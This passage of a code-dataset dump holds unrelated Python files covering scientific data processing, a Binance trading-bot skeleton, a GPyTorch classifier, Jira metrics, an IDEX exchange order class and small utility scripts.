without using map :(\n\nCreated by Shraddha Shrestha on March 15, 2016.\nCopyright 2016 Shraddha Shrestha. All rights reserved.\n\n\"\"\"\n\nimport os\nimport argparse\nimport glob\n\n\ndef get_parser():\n \"\"\"Get directory information from user\"\"\"\n parser = argparse.ArgumentParser(\n description=\"\"\"Getting access to files in user's directory input\"\"\")\n parser.add_argument(\n \"--directory\",\n required = True,\n type=str,\n help=\"\"\"user's input directory with files, copy directory address/\\\n path as a text (right click on directory)\"\"\"\n )\n return parser.parse_args()\n\n\ndef sum_of_integers(A):\n #my_files = glob.glob(os.path.join(args.directory, '*.txt'))\n total = 0\n #print(my_files)\n for file in A:\n #print(file)\n with open(file, 'r') as f:\n for line in f:\n for word in line.split():\n #print(word)\n total = total + int(word)\n return total\n\n\ndef main():\n args = get_parser()\n my_files = glob.glob(os.path.join(args.directory, '*.txt'))\n result = sum_of_integers(my_files)\n print(result)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"answers/sthshraddha/Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"146056678","text":"\"\"\"\nGet station pair information from the CC stacks based on file names\n\"\"\"\nimport os \nfrom glob import glob\nfrom obspy import read\n\n\nnetstas_a = []\nnetstas_b = []\nlats = dict()\nlons = dict()\nwith open(\"station_pairs.txt\", \"w\") as f:\n for dir_ in glob(\"SAC_I3_stack_4_Zendo/*_stack\"):\n phase, _, typ, _ = os.path.basename(dir_).split(\"_\")\n for dir_ in sorted(glob(os.path.join(dir_, \"*_*\"))):\n for i, fullpath in enumerate(sorted(glob(os.path.join(dir_, \"*\")))):\n fid = os.path.basename(fullpath)\n fid = os.path.splitext(fid)[0]\n _, net_a, sta_a, net_b, sta_b = fid.strip().split(\"_\")\n if i == 0:\n f.write(f\"{phase.upper()} {typ.upper()} {net_a}.{sta_a}\\n\")\n f.write(f\"\\t{net_b}.{sta_b}\\n\")\n\n netsta_a = f\"{net_a} {sta_a}\"\n netsta_b = f\"{net_b} {sta_b}\"\n if netsta_a not in netstas_a:\n netstas_a.append(netsta_a)\n if netsta_b not in netstas_b:\n netstas_b.append(netsta_b)\n st = read(fullpath)\n lats[netsta_b] = st[0].stats.sac.stla\n lons[netsta_b] = st[0].stats.sac.stlo\n\n\nassert(len(netstas_a) == len(netstas_b))\n\nwith open(\"STATIONS_LIU2022\", \"w\") as f:\n for netsta in sorted(netstas_b):\n net, sta = netsta.split(\" \")\n f.write(f\"{sta:>6}{net:>6}{lats[netsta]:11.4f}{lons[netsta]:11.4f}{0:7.1f}{0:7.1f}\\n\")\n\n","sub_path":"simulations/ambient_noise_adjtomo/get_station_pairs.py","file_name":"get_station_pairs.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"600402206","text":"import matplotlib.pyplot as plt\nimport fast_cppn\nimport quad_tree\nimport queue\nimport random\n\n\ndef get_pattern(cppn, x1, y1, x2_range=[-1, 1], y2_range=[-1, 1],\n step=0.05, threshold=None):\n import numpy as np\n output = []\n i = 0\n for y in np.arange(y2_range[0], y2_range[1], step):\n output.append([])\n for x in np.arange(x2_range[0], x2_range[1], step):\n temp = cppn.run(x1,y1,x,y)[0]\n\n if threshold is not None:\n if abs(temp) > threshold:\n output[i].append(temp)\n else:\n output[i].append(0)\n else:\n output[i].append(temp)\n cppn.restart_network()\n i += 1\n return np.array(output)\n\ndef show_cppn(output, colormap=\"BuGn\"):\n import matplotlib.pyplot as plt\n\n cs = plt.contourf(output, 100, cmap=colormap,\n origin='lower',extent=[-1, 1, -1, 1])\n plt.colorbar()\n ax = plt.gca() # gca stands for 'get current axis'\n ax.spines['bottom'].set_position(('data', 0))\n ax.spines['left'].set_position(('data', 0))\n\n return ax\n\n\ndef overlay_tree(pattern, quad_tree, var_thr,colormap=\"autumn\"):\n ax = show_cppn(pattern, colormap)\n q = queue.Queue()\n q.put(quad_tree)\n while not q.empty():\n p = q.get()\n if p.variance > var_thr:\n for child in p.children:\n q.put(child)\n else:\n ax.add_patch(plt.Rectangle((p.x-p.width,p.y-p.width), p.width*2, p.width*2, alpha = 1, fill = None))\n ax.add_patch(plt.Circle((p.x,p.y), 0.01, fc = 'r'))\n\n q.task_done()\n plt.show()\n return\n\n\ndef plot_quadtree(quad_tree, var):\n ax = plt.gca()\n q = queue.Queue()\n q.put(quad_tree)\n while not q.empty():\n p = q.get()\n if p.variance > var_thr:\n for child in p.children:\n q.put(child)\n else:\n if p.weight < 0.5:\n ax.add_patch(plt.Rectangle((p.x-p.width,p.y-p.width), p.width*2, p.width*2, alpha = 0.5, color = 'k'))\n ax.add_patch(plt.Circle((p.x,p.y), 0.01, fc = 'r'))\n q.task_done()\n plt.axis([-1, 1, -1, 1])\n ax.spines['bottom'].set_position(('data', 0))\n ax.spines['left'].set_position(('data', 0))\n plt.show()\n return\n\ndef get_rectangle(node, color):\n x, y = offset_center(node)\n return plt.Rectangle((x, y), node.width, node.width, fc=color)\n\n\ntest_net = fast_cppn.fast_network(4, 1, node_count=5)\ntest_net.add_connection(0, 4, 5.)\ntest_net.add_connection(1, 4, 5.)\ntest_net.add_connection(2, 4, 5.)\ntest_net.add_connection(3, 4, 5.)\n\ntest_net.set_activation_function(0, 0)\ntest_net.set_activation_function(1, 0)\ntest_net.set_activation_function(2, 0)\ntest_net.set_activation_function(3, 0)\ntest_net.set_activation_function(4, 3)\n\ndiv_thr = 0.003\nvar_thr = 0.003\nband_thr = 0.003\n\npattern = get_pattern(test_net,0,0)\nqtr = quad_tree.Quadtree()\n\n #a, b, cppn, div_thr = 0.03 , outgoing = False, initialDepth =4, maxDepth = 4\nqtr.division_initialization(0, 0, test_net)\n\nprint(qtr.prune_extract(0,0,qtr,test_net))\noverlay_tree(pattern, qtr, var_thr, \"bone\")\n\n","sub_path":"plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"467344282","text":"#!/usr/bin/python\n#coding:utf-8\nimport datetime\nimport gc\nimport traceback\n\nimport numpy\nfrom sqlalchemy import or_\n\nfrom market_strategy import config\nfrom market_strategy.MyDBSession import MyDBSession\nfrom market_strategy.common.ServerJiao import ServerJiao\nfrom market_strategy.entity.BinanceEntity import BinanceEntity\nfrom market_strategy.http_server.myServer import flask_app\nfrom market_strategy.market_pair.binancePair import BinancePair\nfrom market_strategy.myLogger import log as logger\nimport time\nfrom concurrent.futures import ThreadPoolExecutor, wait, thread\nfrom market_strategy.Order import Order,DBSession\nfrom tools.binance.client import Client\n\n\nclass StrategyCLI:\n def __init__(self):\n self.market_pairs = []\n self.market_sell_pairs = []\n\n def base_init(self):\n self.get_binance()\n self.init_db_config()\n self.game_start=True\n self.threadpool_30m = ThreadPoolExecutor(max_workers=1)\n self.threadpool_flask = ThreadPoolExecutor(max_workers=1)\n self.flask_threadpool_run()\n\n def get_binance(self):\n try:\n self.binance = Client(config.binance_key,\n config.binance_secret)\n except Exception as e:\n self.get_binance()\n\n def main(self):\n logger.debug(\"main\")\n self.base_init()\n self.create_bean()\n\n\n try :\n self.loop()\n except Exception as e:\n logger.fatal(\"宕机了。。。。。。。。。\")\n traceback.print_exc()\n logger.fatal(e)\n self.loop()\n\n def create_bean(self):\n all_tickers = self.binance.get_all_tickers()\n sell_tickers=self.get_waiting_sell(self.init_db_config())\n binance_coin_pairs_30m =sell_tickers.append(all_tickers)\n\n for value_map in binance_coin_pairs_30m:\n symbol=value_map[\"symbol\"]\n if(symbol.find(\"BTC\",2)>0):\n merge_bean = BinancePair(value_map[\"symbol\"],\"30m\",self.binance )\n self.market_pairs.append(merge_bean)\n\n def loop(self):\n while(True):\n for market_pair in self.market_pairs:\n if(market_pair.time_type == \"5m\"):\n self.threadpool_5m_run(market_pair)\n elif(market_pair.time_type == \"15m\"):\n self.threadpool_15m_run(market_pair)\n elif(market_pair.time_type == \"30m\"):\n self.threadpool_30m_run(market_pair)\n\n time.sleep(config.refresh_rate)\n\n # 为线程定义一个函数\n def start_sell_pairs(self,mod):\n if(mod == 3):\n self.create_waiting_sell_bean()\n for market_pair in self.market_sell_pairs:\n self.sell_threadpool_run(market_pair)\n pass\n\n def sell_threadpool_run(self,market_pair):\n futures = []\n futures.append(self.sell_threadpool.submit(self.market_get_data,market_pair))\n\n def flask_threadpool_run(self):\n logger.warn(\"flask is running\")\n futures = []\n #futures.append(self.threadpool_flask.submit(self.run_flask,flask_app))\n\n def threadpool_30m_run(self,market_pair):\n futures = []\n futures.append(self.threadpool_30m.submit(self.market_get_data,market_pair))\n\n\n def market_get_data(self,market_pair):\n market_pair.get_history_data()\n\n def get_waiting_sell(self,config):\n # 创建session对象:\n myDBsession=MyDBSession()\n DBSessionClass=myDBsession.getDBSessionClass(config)\n session = DBSessionClass()\n\n order_result = session.query(Order).filter( or_( Order.type == 0 ,Order.type == 2) ) \\\n .filter(Order.strategy_type == self.strategy_type)\n\n #说明有成交的买单,那么就可以进行卖出操作了\n #更新数据库\n order_list=order_result.all()\n return order_list\n\n def init_db_config(self,username=config.username,password=config.password,ip=config.ip,db_name=config.db):\n self.config={}\n self.config[\"username\"]=username\n self.config[\"password\"]=password\n self.config[\"ip\"]=ip\n self.config[\"db_name\"]=db_name\n self.game_flag = False\n\n def run_flask(self,flask_app):\n return\n flask_app.strategy_bean = self\n #flask_app.run(host='0.0.0.0',port=5000,debug=True)\n\n def sell_all(self):\n result=self.binance.get_open_orders()\n for entity in result:\n binance_entity=BinanceEntity(**entity)\n\n #撤单,\n cancel_result=self.binance.cancel_order(symbol=binance_entity.symbol,orderId=binance_entity.orderId)\n ServerJiao.send_server_warn(desp=cancel_result,text=binance_entity.symbol+':撤单'+binance_entity.side)\n\n\n balance_data_list=self.binance.get_account()[\"balances\"]\n\n for entity in balance_data_list:\n symbol=entity[\"asset\"]\n free = float(entity[\"free\"])\n\n if free <1:\n continue\n\n symbol=symbol+\"ETH\"\n try :\n free=numpy.floor(free)\n self.binance.order_market_sell(symbol=symbol,quantity=free)\n ServerJiao.send_server_warn(desp=cancel_result,text=binance_entity.symbol+':卖出'+binance_entity.side)\n except Exception as e:\n continue\n\n message=\"指令sell_all执行完毕\"\n ServerJiao.send_server_warn(message)\n return message\n\n def change_eth_left(self,amount):\n config.eth_left_size=amount\n return \"change_eth_left successfully : \"+config.eth_left_size\n\n def change_game(self):\n config.market_game_start=not(config.market_game_start)\n return \"change_game successfully : \"+config.market_game_start\n\ndef main():\n cli = StrategyCLI()\n cli.main()\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"market_strategy/strategy/base_strategy.py","file_name":"base_strategy.py","file_ext":"py","file_size_in_byte":5856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"125694504","text":"import numpy as np\r\n\r\nN = 4\r\nM = 6\r\n\r\nA = np.random.randint(-10, 10, (N, M))\r\nprint(\"Матрица:\" + str(A))\r\n\r\nsum_elements = np.sum(A)\r\nsum_cols = np.sum(A, axis=1)\r\nA = np.column_stack((A, sum_cols/sum_elements))\r\n\r\nprint(\"Новая матрица: \" + str(A))","sub_path":"Копытов/2/задача 7.py","file_name":"задача 7.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"524133688","text":"# Copyright (c) 2016 by Mike Jarvis and the other collaborators on GitHub at\n# https://github.com/rmjarvis/Piff All rights reserved.\n#\n# Piff is free software: Redistribution and use in source and binary forms\n# with or without modification, are permitted provided that the following\n# conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the disclaimer given in the accompanying LICENSE\n# file.\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the disclaimer given in the documentation\n# and/or other materials provided with the distribution.\n\n# Test routines for the pixellated Piff PSF model\n\"\"\"\nProgram to fit a set of stars in a FITS image using stars listed in a FITS table.\n\"\"\"\n\nimport numpy as np\nimport galsim\nimport astropy.io.fits as pyfits\nimport piff\n\nimport logging\n\ndef stardata_from_fits(hdu_list, xysky, stamp_size=51, badmask=0x7FFF,\n logger=None):\n \"\"\"Create StarData instances from data in FITS hdu's.\n\n :param scihdu: An astropy FITS HDU list holding the science image\n and weight image extensions.\n :param xysky: list of (x,y,sky) tuples for stars\n :param stamp_size: size of postage stamp to use\n :param badmask: Bits set in mask plane that invalidate a pixel.\n [Note: don't use bit 15, it is usually messed up\n due to int/uint confusions in FITS readers.]\n\n :returns: StarData instance\n \"\"\"\n # Get the image data and weight and mask planes\n sci_extn = -1\n wgt_extn = -1\n msk_extn = -1\n for i,extn in enumerate(hdu_list):\n try:\n desext = extn.header['DES_EXT'].strip()\n if desext=='IMAGE':\n sci_extn = i\n elif desext=='WEIGHT':\n wgt_extn = i\n elif desext=='MASK':\n msk_extn = i\n except KeyError:\n pass\n\n # ??? Errors if extensions are <0\n def fatal(msg,logger):\n if logger:\n logger_error(msg)\n print(msg)\n sys.exit(1)\n\n if sci_extn<0:\n fatal('Cannot find IMAGE extension of FITS file')\n if msk_extn<0:\n fatal('Cannot find MASK extension of FITS file')\n if wgt_extn<0:\n fatal('Cannot find WEIGHT extension of FITS file')\n\n sci = galsim.fits.read(hdu_list=hdu_list[sci_extn], compression='rice')\n wgt = galsim.fits.read(hdu_list=hdu_list[wgt_extn], compression='rice')\n msk = galsim.fits.read(hdu_list=hdu_list[msk_extn], compression='rice')\n hdr = hdu_list[sci_extn].header\n\n # Null weights using mask bits\n good = np.bitwise_and(msk.array.astype(np.uint16), badmask)==0\n wgt *= np.where(good, 1., 0.)\n\n # Determine gain and telescope pointing\n props = {}\n try:\n props['gain'] = hdr['GAIN']\n except KeyError:\n # Try GAINA if no GAIN ??? pick correct side??\n props['gain'] = hdr['GAINA']\n\n # Get exposure pointing from header\n ra = galsim.Angle(hdr['CRVAL1'],galsim.degrees)\n dec = galsim.Angle(hdr['CRVAL2'],galsim.degrees)\n ra = galsim.HMS_Angle(hdr['TELRA'])\n dec = galsim.DMS_Angle(hdr['TELDEC'])\n pointing = galsim.CelestialCoord(ra,dec)\n if logger:\n logger.info(\"pointing = %s hours, %s deg\", pointing.ra/galsim.hours,\n pointing.dec/galsim.degrees)\n\n # Now iterate through all stars\n stardata = []\n for x,y,sky in xysky:\n x0 = int(np.floor(x+0.5))\n y0 = int(np.floor(y+0.5))\n stamp_radius = stamp_size // 2\n xmin = max(x0-stamp_radius, sci.bounds.xmin)\n xmax = min(x0-stamp_radius+stamp_size-1, sci.bounds.xmax)\n ymin = max(y0-stamp_radius, sci.bounds.ymin)\n ymax = min(y0-stamp_radius+stamp_size-1, sci.bounds.ymax)\n b = galsim.BoundsI(xmin,xmax,ymin,ymax)\n\n # Subtract sky counts, get data & weight\n stamp = sci[b] - sky\n weight = wgt[b].copy()\n\n if np.all(weight.array==0.):\n # No good pixels in a star\n if logger:\n logger.info('Discarding star at (%d,%d) with no valid pixels',x0,y0)\n continue\n # Create StarData\n props['sky'] = sky\n stardata.append(piff.StarData(stamp,\n image_pos=galsim.PositionD(x,y),\n weight=weight,\n pointing=pointing,\n properties=props.copy()))\n return stardata, sci.wcs, pointing\n\n\ndef fit_des(imagefile, catfile, order=2, nstars=None,\n scale=0.15, size=41, stamp_size=51, start_sigma=0.4,\n logger=None):\n \"\"\"\n Fit polynomial interpolated pixelized PSF to a DES image,\n using the stars in a catalog. For a single CCD.\n\n :param imagefile: Path to the image file\n :param catfile: Path to FITS SExtractor catalog holding only stars\n :param order: What order to use for the PSF interpolation [default: 2]\n :param nstars: If desired, a number fo stars to select from the full set to use.\n [default: None, which means use all stars]\n :param scale: The scale to use for the Pixel model [default: 0.15]\n :param size: The size to use for the Pixel grid [default: 41]\n :param stamp_size: The stamp size to get for the data arrays [default: 51]\n :param start_sigma: The starting sigma value for Pixel mode [default: 0.4]\n\n :returns: a completed PSF instance.\n \"\"\"\n # Get the stellar images\n if logger:\n logger.info(\"Opening FITS images\")\n ff = pyfits.open(imagefile)\n cat = pyfits.getdata(catfile,2) # ??? hard-wired extension right now\n\n if nstars is not None:\n index = np.random.choice(len(cat), size=nstars, replace=False)\n cat = cat[index]\n # ??? make any other object cuts here!\n\n xysky = zip(cat['XWIN_IMAGE'],cat['YWIN_IMAGE'],cat['BACKGROUND'])\n\n if logger:\n logger.info(\"Creating %d StarDatas\",len(xysky))\n original, wcs, pointing = stardata_from_fits(ff, xysky, stamp_size=stamp_size, logger=logger)\n\n if logger:\n logger.info(\"...Done making StarData\")\n\n # Add shot noise to data\n data = [s.addPoisson() for s in original]\n\n stars = [ piff.Star(d, None) for d in data ]\n\n # Make model, force PSF centering\n model = piff.PixelModel(scale=scale, size=size, interp=piff.Lanczos(3),\n force_model_center=True, start_sigma = start_sigma,\n logger=logger)\n # Interpolator will be zero-order polynomial.\n # Find u, v ranges\n u = [s['u'] for s in data]\n v = [s['v'] for s in data]\n uvrange = ( (np.min(u),np.max(u)), (np.min(v),np.max(v)) )\n interp = piff.BasisPolynomial(order, ranges=uvrange, logger=logger)\n\n\n # Make a psf\n if logger:\n logger.info(\"Building PSF\")\n wcs = {0 : wcs}\n psf = piff.PSF.build(stars, wcs, pointing, model, interp, logger=logger)\n\n # ??? Do a \"refinement\" run with the model used to generate\n # the Poisson noise instead of the signal.\n\n return psf\n\ndef subtract_stars(img, psf):\n \"\"\"Subtract modeled stars from the image.\n\n :param img: GalSim Image of a CCD\n :param psf: PSF model that has been fit to stars on this image\n\n :returns: Image with the stellar models subtracted\n \"\"\"\n for s in psf.stars:\n fitted = psf.draw(s.data, s.fit.flux, s.fit.center)\n img[fitted.image.bounds] -= fitted.image\n return img\n\ndef main():\n\n logger = piff.config.setup_logger(3)\n\n image_file = 'y1_test/DECam_00241238_01.fits.fz'\n cat_file = 'y1_test/DECam_00241238_01_psfcat_tb_maxmag_17.0_magcut_3.0_findstars.fits'\n out_file = 'output/no_stars.fits.fz'\n\n psf = fit_des(image_file, cat_file, order=2, nstars=25, scale=0.2, size=21, logger=logger)\n\n orig_image = galsim.fits.read(image_file)\n no_stars_img = subtract_stars(orig_image, psf)\n no_stars_img.write(out_file)\n\n cmd = 'ds9 -zscale -zoom 0.5 %s %s -blink interval 1 -blink'%(image_file,out_file)\n logger.warn('To open this in ds9, blinking the stars on and off, execute the command:')\n logger.warn('\\n%s\\n',cmd)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tests/fit_des.py","file_name":"fit_des.py","file_ext":"py","file_size_in_byte":8336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"167695335","text":"import math\nimport torch\nimport gpytorch\nimport matplotlib \nfrom matplotlib import pyplot as plt\n\n#torch.backends.cudnn.benchmark=True\ncuda = torch.device(\"cuda:0\") \nimport torchvision\nimport torchvision.datasets as datasets\ntorch.cuda.set_device(0)\n#torch.set_num_threads(40)\n\nmnist_trainset = datasets.MNIST(root='./data', train=True, download=False, transform=None)\nmnist_testset =datasets.MNIST(root='./data', train=False, download=False, transform=None)\ntrain_x=mnist_trainset.data[0:6000].view(-1,28*28).float()\ntrain_y=mnist_trainset.targets[0:6000]\ntrain_y=train_y\ntrain_y=train_y.float()\n\nfrom gpytorch.models import AbstractVariationalGP\nfrom gpytorch.variational import CholeskyVariationalDistribution\nfrom gpytorch.variational import VariationalStrategy\n\n\nclass GPClassificationModel(AbstractVariationalGP):\n def __init__(self, train_x):\n variational_distribution = CholeskyVariationalDistribution(train_x.size(0))\n variational_strategy = VariationalStrategy(self, train_x, variational_distribution)\n super(GPClassificationModel, self).__init__(variational_strategy)\n self.mean_module = gpytorch.means.ConstantMean()\n self.covar_module = gpytorch.kernels.ScaleKernel(gpytorch.kernels.RBFKernel())\n\n def forward(self, x):\n mean_x = self.mean_module(x)\n covar_x = self.covar_module(x)\n latent_pred = gpytorch.distributions.MultivariateNormal(mean_x, covar_x)\n return latent_pred\n\n\n# Initialize model and likelihood\nmodel = GPClassificationModel(train_x)\nlikelihood = gpytorch.likelihoods.BernoulliLikelihood()\n\n\nfrom gpytorch.mlls.variational_elbo import VariationalELBO\n\n# Find optimal model hyperparameters\nmodel=model\nmodel.train()\nlikelihood.train()\n\n# Use the adam optimizer\noptimizer = torch.optim.Adam(model.parameters(), lr=0.1)\n\n# \"Loss\" for GPs - the marginal log likelihood\n# num_data refers to the amount of training data\nmll = VariationalELBO(likelihood, model, train_y.numel())\nwith torch.cuda.device(0):\n training_iter = 100\n for i in range(training_iter):\n for j in range(6):\n \t# Zero backpropped gradients from previous iteration\n optimizer.zero_grad()\n \t# Get predictive output\n output = model(train_x[1000*j:1000*(j+1)])\n \t# Calc loss and backprop gradients\n loss = -mll(output, train_y[1000*j:1000*(j+1)])\n loss.backward()\n print('Iter %d/%d - Loss: %.3f' % (i + 1, training_iter, loss.item()))\n optimizer.step()\n\n\n'''\ntraining_iter = 100\nfor i in range(training_iter):\n# Zero backpropped gradients from previous iteration\n\toptimizer.zero_grad()\n# Get predictive output\n\toutput = model(train_x)\n# Calc loss and backprop gradients\n\tloss = -mll(output, train_y)\n\tloss.backward()\n\tprint('Iter %d/%d - Loss: %.3f' % (i + 1, training_iter, loss.item()))\n\toptimizer.step()\n'''\n\n","sub_path":"Batches.py","file_name":"Batches.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"541010210","text":"\"\"\"\nCopyright 2012-2017 Ministerie van Sociale Zaken en Werkgelegenheid\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nfrom __future__ import absolute_import\n\nfrom ... import metric_source\nfrom ...domain import HigherIsBetterMetric, LowerIsBetterMetric\n\n\nclass ReadyUserStoryPoints(HigherIsBetterMetric):\n \"\"\" Metric for measuring the number of user story points ready. \"\"\"\n\n name = 'Hoeveelheid ready user story punten'\n unit = 'ready user story punten'\n norm_template = 'Het aantal {unit} is meer dan {target}. Minder dan {low_target} {unit} is rood.'\n template = 'Het aantal {unit} is {value}.'\n target_value = 10\n low_target_value = 20\n metric_source_class = metric_source.Jira\n\n def value(self):\n nr_points = self._metric_source.nr_story_points_ready()\n return -1 if nr_points in (-1, None) else nr_points\n\n def _metric_source_urls(self):\n return [self._metric_source.user_stories_ready_url()]\n\n\nclass UserStoriesWithoutAssessmentMetric(LowerIsBetterMetric):\n \"\"\" Metric for measuring the number of user stories without the proper assessment. \"\"\"\n norm_template = 'Het aantal {unit} is minder dan {target}. Meer dan {low_target} {unit} is rood.'\n template = 'Het aantal {unit} is {value}.'\n target_value = 1\n low_target_value = 3\n metric_source_class = metric_source.Jira\n nr_user_stories_without_risk_assessment = 'subclass responsibility'\n\n def value(self):\n nr_stories = getattr(self._metric_source, self.nr_user_stories_without_risk_assessment)()\n return -1 if nr_stories in (-1, None) else nr_stories\n\n\nclass UserStoriesWithoutSecurityRiskAssessment(UserStoriesWithoutAssessmentMetric):\n \"\"\" Metric for measuring the number of user stories without security risk assessment. \"\"\"\n\n name = 'Hoeveelheid user stories zonder security risk beoordeling'\n unit = 'user stories zonder security risk beoordeling'\n nr_user_stories_without_risk_assessment = 'nr_user_stories_without_security_risk_assessment'\n\n def _metric_source_urls(self):\n return [self._metric_source.user_stories_without_security_risk_assessment_url()]\n\n\nclass UserStoriesWithoutPerformanceRiskAssessment(UserStoriesWithoutAssessmentMetric):\n \"\"\" Metric for measuring the number of user stories without performance risk assessment. \"\"\"\n\n name = 'Hoeveelheid user stories zonder performance risk beoordeling'\n unit = 'user stories zonder performance risk beoordeling'\n nr_user_stories_without_risk_assessment = 'nr_user_stories_without_performance_risk_assessment'\n\n def _metric_source_urls(self):\n return [self._metric_source.user_stories_without_performance_risk_assessment_url()]\n","sub_path":"hqlib/metric/project/process_metrics.py","file_name":"process_metrics.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"313090446","text":"import asyncio\n\nfrom decimal import Decimal\nfrom typing import Any, Dict\n\nfrom hummingbot.core.event.events import OrderType, TradeType\nfrom hummingbot.connector.in_flight_order_base import InFlightOrderBase\n\n\nclass IdexInFlightOrder(InFlightOrderBase):\n def __init__(self,\n client_order_id: str,\n exchange_order_id: str,\n trading_pair: str,\n order_type: OrderType,\n trade_type: TradeType,\n price: Decimal,\n amount: Decimal,\n initial_state: str = \"open\"):\n \"\"\"\n :param client_order_id:\n :param exchange_order_id:\n :param trading_pair:\n :param order_type:\n :param trade_type:\n :param price:\n :param amount:\n :param initial_state: open, partiallyFilled, filled, canceled, rejected\n \"\"\"\n super().__init__(\n client_order_id,\n exchange_order_id,\n trading_pair,\n order_type,\n trade_type,\n price,\n amount,\n initial_state,\n )\n self.fill_id_set = set()\n self.cancelled_event = asyncio.Event()\n\n @property\n def is_done(self) -> bool:\n return self.last_state in {\"filled\", \"canceled\", \"rejected\"}\n\n @property\n def is_failure(self) -> bool:\n return self.last_state in {\"rejected\", }\n\n @property\n def is_cancelled(self) -> bool:\n return self.last_state in {\"canceled\", \"cancelled\"}\n\n @classmethod\n def from_json(cls, data: Dict[str, Any]) -> InFlightOrderBase:\n \"\"\"\n :param data: json data from API\n :return: formatted InFlightOrder\n \"\"\"\n result = IdexInFlightOrder(\n data[\"client_order_id\"],\n data[\"exchange_order_id\"],\n data[\"trading_pair\"],\n getattr(OrderType, data[\"order_type\"]),\n getattr(TradeType, data[\"trade_type\"]),\n Decimal(data[\"price\"]),\n Decimal(data[\"amount\"]),\n data[\"last_state\"]\n )\n result.executed_amount_base = Decimal(data[\"executed_amount_base\"])\n result.executed_amount_quote = Decimal(data[\"executed_amount_quote\"])\n result.fee_asset = data[\"fee_asset\"]\n result.fee_paid = Decimal(data[\"fee_paid\"])\n result.last_state = data[\"last_state\"]\n return result\n\n def update_with_fill_update(self, fill_update: Dict[str, Any]) -> bool:\n \"\"\"\n Updates the in flight order with fill update (from private/get-order-detail end point)\n return: True if the order gets updated otherwise False\n \"\"\"\n fill_id = fill_update[\"i\"] if \"i\" in fill_update else fill_update.get(\"i\")\n if fill_id in self.fill_id_set:\n # fill already recorded\n return False\n self.fill_id_set.add(fill_id)\n self.executed_amount_base += Decimal(str(fill_update[\"q\"] if \"q\" in fill_update else\n fill_update.get(\"quantity\")))\n self.fee_paid += Decimal(str(fill_update[\"f\"] if \"f\" in fill_update else fill_update.get(\"fee\")))\n self.executed_amount_quote += (\n Decimal(str(fill_update[\"p\"] if \"p\" in fill_update else fill_update.get(\"price\"))) * Decimal(\n str(fill_update[\"q\"] if \"q\" in fill_update else fill_update.get(\"quantity\")))\n )\n if not self.fee_asset:\n self.fee_asset = fill_update[\"a\"] if \"a\" in fill_update else fill_update.get(\"feeAsset\")\n return True\n","sub_path":"hummingbot/connector/exchange/idex/idex_in_flight_order.py","file_name":"idex_in_flight_order.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"200319157","text":"# Python program to demonstrate \n# command line arguments \n\nimport sys \nimport os\nimport os.path\nfrom os import path\nfrom shutil import copyfile\nimport subprocess\nfrom subprocess import call\n \n# total arguments \nn = len(sys.argv) \n\nif n<2:\n print(\"Usage : python3 generateNewProject.pl \")\n exit()\n\nprojectName = sys.argv[1]\nprojectPath = \"../../Applications/\"+sys.argv[1]\n\nif path.exists(projectPath):\n print(projectName + \" already exists\")\n exit()\n\nprint(\"Creating project : \"+projectName)\nos.mkdir(projectPath)\nos.mkdir(projectPath+\"/build\")\nos.mkdir(projectPath+\"/src\")\nos.mkdir(projectPath+\"/include\")\nos.mkdir(projectPath+\"/configs\")\ncopyfile(\"CMakeLists_template.txt\", projectPath+\"/CMakeLists.txt\")\ncopyfile(\"main_template.c\", projectPath+\"/src/main.c\")\ncopyfile(\"Kconfig_template\", projectPath+\"/Kconfig\")\ngenerateCommand = \"bash generateForSingleProject.sh \"+projectName\ncall(generateCommand,shell=True)\nsedCmd = \"sed -i \\'s/Task_Name_placeholder/\"+projectName+\"/g\\' \"+ projectPath+\"/src/main.c\"\ncall(sedCmd,shell=True)","sub_path":"Tools/SEGGER/generateNewProject.py","file_name":"generateNewProject.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"158718057","text":"from rest_framework import pagination\nfrom rest_framework.response import Response\n\n\nclass CustomPagination(pagination.PageNumberPagination):\n def get_paginated_response(self, data):\n return Response({\n 'results': data,\n 'pagination': {\n 'num_results': self.page.paginator.count,\n 'num_pages': self.page.paginator.num_pages,\n 'display_page_controls': self.display_page_controls,\n 'page_current': self.page.number,\n 'page_size': self.page_size,\n 'next_url': self.get_next_link(),\n 'previous_url': self.get_previous_link()\n }\n })\n","sub_path":"rodgal/pagination.py","file_name":"pagination.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"135744843","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2011 - 2013 Björn Larsson\n\n# This file is part of 